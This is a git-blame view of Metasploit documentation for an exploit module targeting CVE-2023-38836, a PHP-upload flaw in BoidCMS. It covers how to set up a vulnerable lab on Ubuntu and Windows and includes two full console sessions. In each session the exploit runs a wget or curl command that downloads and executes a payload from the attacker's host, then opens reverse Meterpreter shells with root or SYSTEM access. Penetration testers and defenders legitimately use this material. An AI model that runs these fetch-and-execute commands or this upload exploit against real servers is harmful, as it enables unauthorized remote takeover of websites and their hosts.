adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

235 lines
9.8 KiB
Markdown
Raw Normal View History

Add documentation and fix default payloads
2024-02-16 16:49:49 -06:00
## Vulnerable Application
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
Updates based on jheysel-r7's suggestions
2024-02-29 12:42:22 -06:00
and below. BoidCMS allows the authenticated upload of a php file as media if the file has
Add documentation and fix default payloads
2024-02-16 16:49:49 -06:00
the GIF header, even if the file is a php file.
Once the file is uploaded, a user can then feed a command to the php file in a `GET` request.
## Installation
### Ubuntu 22.01.1x64 (Any 'nix should work)
Updates based on jheysel-r7's suggestions
2024-02-29 12:42:22 -06:00
1. `sudo apt-get install apache2 #install apache`
Add documentation and fix default payloads
2024-02-16 16:49:49 -06:00
2. `sudo apt-get install php8.0 #install php`
3. `sudo a2enmod rewrite #enable mod_rewrite`
4. `sudo systemctl restart apache2 #restart apache2`
5. Follow installation instructions here: https://boidcms.github.io/#/install
a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
the contents into the `/var/www/html/` folder on the apache server.
b. Add
`$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
before the following line:
`$App->render();`
6. `reboot`
7. `cd /var/www/html`
8. `sudo php -S [ip_address]:8080 #start php server`
### Windows 2019 server (Any Windows should work)
Updates based on jheysel-r7's suggestions
2024-02-29 12:42:22 -06:00
1. Download and install XMAPP for Windows from https://www.apachefriends.org/download.html
Add documentation and fix default payloads
2024-02-16 16:49:49 -06:00
2. Reboot
3. Open XAMPP Control panel as admin.
4. Follow installation instructions here: https://boidcms.github.io/#/install
a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
the contents into the `C:\xampp\htdocs\` folder on the apache server.
b. Add
`$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
before the following line:
`$App->render();`
5. Verify that mod_rewrite is enabled for Apache.
a. Click on the `Config` button beside the Apache status in XAMPP Control panel
b. Select the httpd.conf
c. Verify `LoadModule rewrite_module modules/mod_rewrite.so` is uncommented
d. Restart Apache if you needed to uncomment the above line
6. Start the php server
a. Open cmd window as Administrator
b. `cd C:\xampp\htdocs\`
c. `C:\xampp\php\php.exe -S 10.5.134.102:8080` #I don't know why we start the server on port 8080,
but on windows, we access with the rport value of 80.
## Verification Steps
1. Install BoidCMS
1. Start msfconsole
1. Do: `use exploit/multi/http/cve_2023_38836_boidcms`
1. Do: `set CMS_USERNAME [username]`
1. Do: `set CMS_PASSWORD [password]`
1. Do: `set TARGETURI [target uri]`
1. Do: `run`
1. You should get a shell.
## Options
### CMS_USERNAME
The username for the BoidCMS admin panel. Default is `admin`
### CMS_PASSWORD
The username for the BoidCMS admin panel. Default is `password`
### TARGETURI
The root of the web page BoidCMS manages. Empty string by default.
## Scenarios
### BoidCMS on Ubuntu 22.04.1x64
```
msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
Module options (exploit/multi/http/cve_2023_38836_boidcms):
Name Current Setting Required Description
---- --------------- -------- -----------
CMS_PASSWORD password yes Password
CMS_USERNAME admin yes Username
PHP_FILENAME eI1lHLx.php yes The name for the php file to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes The path
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME LZfjvRRrNR no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 nix Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
[*] Command to run on remote host: wget -qO /tmp/oEsnOArk http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/oEsnOArk; /tmp/oEsnOArk &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
[*] Getting Token
[*] Logging into CMS
[*] Uploading PHP file eI1lHLx.php
[*] launching Payload
[*] Client 10.5.134.129 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.134.129
[+] Deleted eI1lHLx.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:49168) at 2024-02-16 16:32:33 -0600
meterpreter > sysinfo
Computer : 10.5.134.129
OS : Ubuntu 22.04 (Linux 6.5.0-17-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```
### BoidCMS on Windows Server 2019x64
```
msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
Module options (exploit/multi/http/cve_2023_38836_boidcms):
Name Current Setting Required Description
---- --------------- -------- -----------
CMS_PASSWORD password yes Password
CMS_USERNAME admin yes Username
PHP_FILENAME eI1lHLx.php yes The name for the php file to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.102 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes The path
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME EwRzYaki no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
[*] Command to run on remote host: curl -so %TEMP%\YnmWUfMzCxY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\YnmWUfMzCxY.exe
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
[*] Getting Token
[*] Logging into CMS
[*] Uploading PHP file eI1lHLx.php
[*] launching Payload
[*] Client 10.5.134.102 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.134.102 (curl/7.55.1)
[+] Deleted eI1lHLx.php
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.102:50085) at 2024-02-16 16:41:48 -0600
meterpreter > sysinfo
Computer : WIN-2E6BPFGP9F7
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN-2E6BPFGP9F7\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```
Reference in New Issue Copy Permalink